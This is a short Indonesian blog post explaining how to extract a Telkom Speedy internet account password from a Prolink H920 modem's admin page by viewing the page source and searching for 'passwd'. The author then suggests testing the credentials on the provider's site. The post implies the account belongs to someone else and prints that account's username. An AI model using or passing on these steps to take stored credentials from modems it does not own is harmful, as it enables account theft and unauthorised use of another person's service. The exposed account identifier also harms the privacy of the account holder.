Ini merupakan tampilan dari modem Prolink H920. Kemudian Pada kolom WAN Interfaces klik ppp-0 seperti yang terlihat pada gambar. Kemudian klik edit untuk melihat konfigurasi dari modem sekaligus untuk mencari account telkomspeedy.

Image

Maka kita akan melihat tampilan seperti dibawah ini:

Image

Untuk melihat password, cukup dengan klik kanan pada pop up diatas view page source. Kemudian cari kata passwd. Lihat hasil pada gambar berikut:

Image

Dari hasil diatas dapat dicoba di situs TelkomSpeedy untuk menguji account yang telah gw dapat. Accountnya adalah 161101201848@telkom.net dan passnya tetap saya hidden kan demi menjaga privacy yang punya account.

- Copyright © SHARING OF KNOWLEDGE - Date A Live - Powered by Blogger - Designed by Johanes Djogan -